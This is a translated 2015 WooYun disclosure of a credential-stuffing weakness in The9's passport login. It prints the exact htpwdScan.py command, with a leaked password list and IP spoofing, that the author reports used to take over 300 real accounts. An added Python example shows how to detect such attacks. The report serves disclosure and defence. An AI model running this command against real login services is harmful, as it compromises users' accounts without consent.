
Vulnerability summary

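Bug ID: wooyun-2015-0110115

Vulnerability title: An endpoint at The9 (第九城市) can be used for credential stuffing attacks (login verified)

Affected vendor: The9 (第九城市)

Author: 路人甲

Submitted: 2015-04-27 15:39

Fixed: 2015-05-02 15:40

Published: 2015-05-02 15:40

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: The vendor has been notified of the vulnerability but has ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]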



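Vulnerability details

Disclosure status:

2015-04-27: Details reported to the vendor; waiting for the vendor to handle them
2015-05-02: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

An endpoint at The9 (第九城市) can be used for credential stuffing attacks (login verified)

Detailed description:

Once again, I ran it using lijiejie's great tool: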
htpwdScan.py -f=C:\Users\Administrator\Desktop\post.txt -https -database loginname,pwd=D:\data\kuzi.txt -regex="([^-]*)----([^-]*)" -err="error" -suc="success" -fip
https://passport.the9.com/index.php

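[Screenshot: QQ截图20150424140552.jpg]


Proof of vulnerability:

[Screenshot: QQ截图20150424140641.jpg]


A total of 300 accounts came out of the run. Some of them are posted here, together with a login screenshot as proof.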

Remediation:

Strengthen verification
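
One way to make that verification concrete, as an added example that is not part of the original report or the vendor's code: a sliding-window check that flags a client failing logins for many different accounts. It assumes the `-fip` flag in the command above makes the tool send spoofed client-IP headers such as `X-Forwarded-For`, so the throttle key is the TCP peer address unless the peer is a known proxy; the thresholds, the proxy address and the sample events are constructed for illustration.

```python
from collections import defaultdict, deque

TRUSTED_PROXIES = {"10.0.0.5"}   # assumption: address of our own reverse proxy
WINDOW = 60                      # seconds (assumed threshold)
LIMIT = 5                        # distinct failed accounts per client per window (assumed)

def client_key(peer_ip, xff, trust_header_blindly=False):
    """Pick the address that login throttling is keyed on."""
    hops = [h.strip() for h in xff.split(",") if h.strip()] if xff else []
    if trust_header_blindly:             # weak setting: the client controls this value
        return hops[0] if hops else peer_ip
    if peer_ip in TRUSTED_PROXIES and hops:
        return hops[-1]                  # entry appended by our own (single) proxy
    return peer_ip                       # direct connection: ignore the header

def flagged_clients(events, trust_header_blindly=False):
    """Return client keys with more than LIMIT distinct failed accounts in WINDOW seconds."""
    recent = defaultdict(deque)          # key -> deque of (timestamp, account)
    flagged = set()
    for ts, peer_ip, xff, account, ok in events:
        if ok:
            continue
        key = client_key(peer_ip, xff, trust_header_blindly)
        q = recent[key]
        q.append((ts, account))
        while q and ts - q[0][0] > WINDOW:
            q.popleft()                  # drop failures older than the window
        if len({a for _, a in q}) > LIMIT:
            flagged.add(key)
    return flagged

# Constructed sample events: (timestamp, peer_ip, X-Forwarded-For, account, success)
EVENTS = [(i, "203.0.113.7", f"192.0.2.{i + 1}", f"user{i}@example.com", False)
          for i in range(8)]
EVENTS += [(3, "198.51.100.20", None, "alice@example.com", False),
           (9, "198.51.100.20", None, "alice@example.com", True)]
EVENTS.sort(key=lambda e: e[0])

if __name__ == "__main__":
    print("keyed on header:", flagged_clients(EVENTS, trust_header_blindly=True))
    print("keyed on peer:  ", flagged_clients(EVENTS))
```

Keyed on the header, every spoofed request looks like a new client and nothing is flagged; keyed on the peer address, the single source is flagged after its sixth distinct failed account, while the user who mistyped one password is not.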

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


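Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-05-02 15:40

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet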

